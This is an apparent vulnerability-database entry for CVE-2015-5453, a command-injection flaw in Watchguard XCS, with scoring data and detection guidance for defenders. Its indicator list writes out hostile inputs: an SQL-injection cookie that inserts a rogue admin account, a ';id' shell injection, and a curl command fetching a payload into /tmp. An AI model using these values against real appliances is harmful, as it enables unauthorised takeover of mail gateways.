cbcvebase.
CVE-2015-5453
published 2015-07-08

CVE-2015-5453: Watchguard XCS 9.2 and 10.0 before build 150522 allow remote authenticated users to execute arbitrary commands via shell metacharacters in the id parameter to…

PriorityP262medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EXPLOIT
EPSS
57.31%
99.0th percentile
Watchguard XCS 9.2 and 10.0 before build 150522 allow remote authenticated users to execute arbitrary commands via shell metacharacters in the id parameter to ADMIN/mailqueue.spl.

Affected

2 ranges
VendorProductVersion rangeFixed in
watchguardxcs
watchguardxcs

Detection & IOCsextracted from sources · hover to see the quote

url/ADMIN/mailqueue.spl
url/borderpost/imp/compose.php3
url/login.spl
cookiesid=1'
cookiesid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(...)
command/usr/local/sbin/curl -k <payload_uri> -o /tmp/<filename>
command;id
otheruid=65534
otherunterminated quoted string
port443
  • Detect SQLi exploitation attempt via the session cookie: look for HTTP requests to /borderpost/imp/compose.php3 where the 'sid' cookie contains SQL metacharacters (e.g., single quote or URL-encoded semicolon followed by INSERT statements targeting sds_users table).
  • Detect OS command injection via GET requests to /ADMIN/mailqueue.spl where the 'id' parameter begins with a semicolon (shell metacharacter), e.g., ?f=dnld&id=;<command>.
  • Successful exploitation results in command execution as uid=65534 (nobody). Monitor web server logs for responses containing 'uid=65534' from /ADMIN/mailqueue.spl.
  • Vulnerability check probe: HTTP request to /borderpost/imp/compose.php3 with cookie sid=1' (single quote). A response body containing 'unterminated quoted string' confirms the SQLi is present.
  • Post-exploitation payload delivery: watch for outbound curl requests from the appliance to attacker-controlled URLs, followed by execution of randomly named binaries dropped in /tmp/.
  • The exploit targets Watchguard XCS 9.2 and 10.0 before build 150522 over HTTPS (port 443). Scope detection rules to these versions and this port.
  • ·The exploit chain combines two vulnerabilities: an unauthenticated SQL injection (to add a rogue admin user) and an authenticated OS command injection. Detection must cover both stages independently, as an attacker with pre-existing valid credentials can skip the SQLi stage and go directly to command injection.
  • ·The backdoor username and password default to 'backdoor'/'backdoor' in the Metasploit module but are configurable; do not rely solely on credential-based detection for the added rogue account.
  • ·The password hash uses a device-specific salting scheme (BorderWare prefix + suffix salts + double MD5). Detection of newly inserted sds_users rows or login attempts with this hash pattern may be more reliable than password value matching.
  • ·The dropped payload filename is randomly generated (8 lowercase alpha characters) under /tmp/, making static filename-based detection unreliable; use behavioral detection for execution of binaries from /tmp/.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.